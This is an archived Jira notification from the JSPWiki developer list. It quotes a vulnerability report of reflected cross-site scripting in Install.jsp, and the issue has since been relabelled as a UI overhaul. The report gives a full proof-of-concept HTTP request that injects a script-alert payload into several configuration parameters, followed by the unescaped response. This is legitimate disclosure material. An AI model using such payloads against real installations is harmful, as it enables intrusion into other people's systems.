You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@jspwiki.apache.org by "Juan Pablo Santos Rodríguez (Jira)" <ji...@apache.org> on 2021/09/23 09:23:00 UTC
[jira] [Updated] (JSPWIKI-1138) Install.jsp UI overhaul
[ https://issues.apache.org/jira/browse/JSPWIKI-1138?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Juan Pablo Santos Rodríguez updated JSPWIKI-1138:
-------------------------------------------------
Flags: (was: Important)
Issue Type: Task (was: Bug)
Labels: (was: XSS)
Security: (was: Security Vulnerability Disclosure)
Summary: Install.jsp UI overhaul (was: Multi XSS via install.jsp)
Per previous comment, editing this issue to keep it as an UI overhaul.
> Install.jsp UI overhaul
> -----------------------
>
> Key: JSPWIKI-1138
> URL: https://issues.apache.org/jira/browse/JSPWIKI-1138
> Project: JSPWiki
> Issue Type: Task
> Components: Core & storage
> Affects Versions: 2.11.0-M8
> Environment: Windows new version
> Firefox version 84.0.1
>
> Reporter: Nguyen Dang Khai
> Priority: Major
> Attachments: xsswiki.PNG
>
>
> In function *install.jsp* exist multi xss in parameter *jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir , jspwiki.workDir*. parameter not sanitize via method *getContentEncoding*().
> * Request :
> {code:java}
> // POST /wiki_jsp_war/Install.jsp HTTP/1.1
> Host: localhost:8080
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 248
> Origin: http://localhost:8080
> Connection: close
> Referer: http://localhost:8080/wiki_jsp_war/Install.jsp
> Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; XDEBUG_SESSION=XDEBUG_ECLIPSE
> Upgrade-Insecure-Requests: 1jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
> {code}
> * Response:
> {code:java}
> // HTTP/1.1 200
> Pragma: no-cache
> Expires: -1
> Cache-Control: no-cache
> Content-Type: text/html;charset=UTF-8
> Content-Language: en-US
> Date: Wed, 23 Dec 2020 10:33:46 GMT
> Connection: close
> Content-Length: 4403<?xml version="1.0" encoding="UTF-8"?>
> ...
> </div><div class="formcontainer"><form action="Install.jsp" method="post"> <!-- Page directory -->
> <h3>Basics</h3> <label class="control-label" >Application Name<input class="form-control" type="text" name="jspwiki.applicationName" size="20" value="'"><script>alert(1)</script>"/>
> </label>
> <div class="help-block">
> What should your wiki be called? Try to use a relative short name.</div> <label class="control-label" >Page storage<input class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" size="40" value="'"><script>alert(1)</script>"/>
> </label>
> <div class="help-block">
> By default, JSPWiki will use the VersioningFileProvider that stores files in a directory. If you specify a directory that does not exist, JSPWiki will try to create it for you. All attachments will also be put in the same directory.</div>
> <h3>Security</h3> <label class="control-label" >Administrator account</label>
> <p>Enabled</p>
> <div class="description">
> This wiki has an administrator account named <strong>admin</strong> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's security policy grants all members of the Admin group the all-powerful <code>AllPermission</code>.</div>
> <h3>Advanced Settings</h3> <label class="control-label" >Work directory<input class="form-control" type="text" name="jspwiki.workDir" size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/>
> </label>
> <div class="help-block">
> This is the place where all caches and other runtime stuff is stored.</div>
> <p class="help-block">
> After you click <em>Configure!</em>, the installer will write your settings to <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>. It will also create an Administrator account with a random password and a corresponding Admin group.</p>
> <input class="btn btn-primary" type="submit" name="submit" value="Configure!" /></form></div><hr />
> <h3>Here is your new jspwiki-custom.properties</h3>
> <pre>jspwiki.applicationName = '"><script>alert(1)</script>
> jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script>
> jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp
> jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script>
> jspwiki.pageProvider = VersioningFileProvider
> </pre>
> <!-- We're done... -->
> </div>
> </div>
> </div>
> </body>
> </html>
> {code}
--
This message was sent by Atlassian Jira
(v8.3.4#803005)